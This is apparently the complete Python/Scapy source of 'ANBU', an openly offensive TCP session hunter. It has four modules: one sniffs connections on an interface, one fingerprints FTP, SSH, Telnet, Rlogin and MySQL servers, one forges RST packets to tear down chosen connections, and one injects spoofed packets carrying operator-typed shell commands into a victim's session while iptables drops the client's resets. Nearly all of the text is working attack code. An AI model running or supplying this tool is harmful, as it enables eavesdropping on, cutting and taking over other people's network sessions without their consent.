# ANBU :: TCP Session Hunter # Author: St0rn #anbu.py # #argv[1] = interface # #!usr/bin/env/python import os import sys import string import thread from scapy.all import * execute = [] ip_src = [] port_src = [] ip_dst = [] port_dst = [] def intro(): print(" )\ )\()) ( )\ (") print(" ((((_)( ((_)\ )((_) )\ ") print(" )\ _ )\ _((_)((_)_ _ ((_)") print(" (_)_\(_)| \| | | _ )| | | |") print(" / _ \ | .` | | _ \| |_| |") print(" /_/ \_\ |_|\_| |___/ \___/") print(" TCP SESSION HUNTER") print("\n\n\n") def list_remp(p): if p.haslayer(IP) and p.haslayer(TCP): if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst: ip_src.append(p[IP].src) port_src.append(p[TCP].sport) ip_dst.append(p[IP].dst) port_dst.append(p[TCP].dport) def list_remp_filter(p, ip): if p.haslayer(IP) and p.haslayer(TCP): if p[IP].src == ip or p[IP].dst == ip: if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst: ip_src.append(p[IP].src) port_src.append(p[TCP].sport) ip_dst.append(p[IP].dst) port_dst.append(p[TCP].dport) def sniff_connect(device): try: sniff(count=0, prn=list_remp, iface=device) except: print "\n Can't Launch sniffer...\n" sys.exit() def sniff_connect_filter(device, ip): try: sniff(count=0, prn= lambda p : list_remp_filter(p,ip), iface=device) except: print "\n Can't Launch sniffer...\n" sys.exit() os.system("clear") intro() if len(sys.argv) < 2: print "\nUsage: anbu.py <interface>\n" else: while 1: inp = raw_input("\n > ") if string.lower(inp) == "help" or string.lower(inp) == "h": print "\n help, h: Show Options" print " server: Server Discovery" print " sniff: sniff all Connexions" print " sniff <ip>: sniff cibled IP :: ex: sniff 192.168.1.34" print " ls: List Connexions" print " rst <nb>: Reset Connexion :: ex: rst 2" print " hijack <nb>: Hijack Connexion :: ex: hijack 2" print " clear: Clear CLI" print " quit, exit, q, e: Exit" elif string.lower(inp) == "ls": print "\n" if len(ip_src) > 1: for i in range(len(ip_src)): print " ["+str(i)+"] " + ip_src[i] + ":" + str(port_src[i]) + " > " + ip_dst[i] + ":" + str(port_dst[i]) else: print " Aucune entrees" elif string.lower(inp) == "empty": ip_src = [] port_src = [] ip_dst = [] port_dst = [] elif string.lower(inp) == "clear": os.system("clear") intro() elif string.lower(inp) == "q" or string.lower(inp) == "quit" or string.lower(inp) == "e" or string.lower(inp) == "exit": sys.exit() elif string.lower(inp) == "sniff": thread.start_new_thread(sniff_connect, (sys.argv[1], )) elif string.lower(inp) == "server": os.system("xterm -e python check_server.py &") else: execute = inp.split(" ") if string.lower(execute[0]) == "sniff": thread.start_new_thread(sniff_connect_filter, (sys.argv[1],execute[1], )) elif string.lower(execute[0]) == "rst": num = execute[1] cmd = "xterm -e python rst_hijack.py " + ip_dst[int(num)] + " " + str(port_dst[int(num)]) + " " + str(ip_src[int(num)]) + " &" os.system(cmd) elif string.lower(execute[0]) == "hijack": num = execute[1] cmd = "xterm -e python session_hijack.py " + ip_src[int(num)] + " " + str(ip_dst[int(num)]) + " " + str(port_dst[int(num)]) + " " + sys.argv[1] + " &" os.system(cmd) else: print "\n Not an option!" ---------------------------- # ANBU :: TCP Session Hunter Module: Server Discovery # Author: St0rn #check_server.py # #!usr/bin/env/python import os from scapy.all import * ip = [] port = [] def check_interest_server(a): if a[IP].src not in ip or a[TCP].sport not in port: ip.append(a[IP].src) port.append(a[TCP].sport) if a[TCP].sport == 21: print "[+] " + a[IP].src + " Is a FTP Server on Port 21" elif a[TCP].sport == 22: print "[+] " + a[IP].src + " Is a SSH Server on port 22" elif a[TCP].sport == 23: print "[+] " + a[IP].src + " Is a Telnet Server on port 23" elif a[TCP].sport == 513: print "[+] " + a[IP].src + " Is a Rlogin Server on port 513" elif a[TCP].sport == 3306: print "[+] " + a[IP].src + " Is a MySQL Server on port 3306" os.system("clear") print "-> Server Discovery\n" print " " sniff(count=0, prn = lambda a : check_interest_server(a), lfilter=lambda(f): f.haslayer(TCP) and f.haslayer(IP)) ----------------------------- # ANBU :: TCP Session Hunter Module: RST Hijacking # Author: St0rn #rst_hijack.py # # argv[1] = remote_host ; argv[2] = remote_port ; argv[3] = target # #!usr/bin/env/python from scapy.all import * import sys import os filtre = "host " + sys.argv[1] + " and port " + sys.argv[2] os.system("clear") print "\nWaiting..." print " " def rst_hijack(p): if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]: print "\n[+] Connection Found!" print " " print "[+] It's time to blow this shit!" ether = Ether(dst=p[Ether].src, src=p[Ether].dst) ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321) tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="R", window=p[TCP].window, options=p[TCP].options) reset = ether/ip/tcp sendp(reset, verbose=0) print "\n\n Press ENTER to continue\n" raw_input() sys.exit() sniff(count=0,prn = lambda p : rst_hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP)) ----------------------------- # ANBU :: TCP Session Hunter Module: Session Hijacking # Author: St0rn #session_hijack.py # # argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] = port_serveur ; argv[4] = iface # #!usr/bin/env/python from scapy.all import * import sys import os filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0" os.system("clear") try: os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP") print("\n [+] iptables rule added for client RST packets\n") except: print("\n [-] iptables rule don't added for client RST packets\n") def hijack_session(p): print(" ") ether = Ether(dst=p[Ether].src, src=p[Ether].dst) ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=1337) tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options) hijack = ether/ip/tcp/"echo 1337\n" sendp(hijack, verbose=0) def perm_session(p): os.system("clear") if p[Raw].load: sys.stdout.write(p[Raw].load + " ") cmd = sys.stdin.read() ether = Ether(dst=p[Ether].src, src=p[Ether].dst) ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=1337) tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options) packet = ether/ip/tcp/(cmd+"\n") sendp(packet, verbose=0) print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"\n") try: sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4]) except: print(" [-] Can't launch sniffer :'(\n") while 1: try: sniff(count = 1, prn=perm_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4]) except: print(" [-] can't launch sniffer :'(\n")
St0rn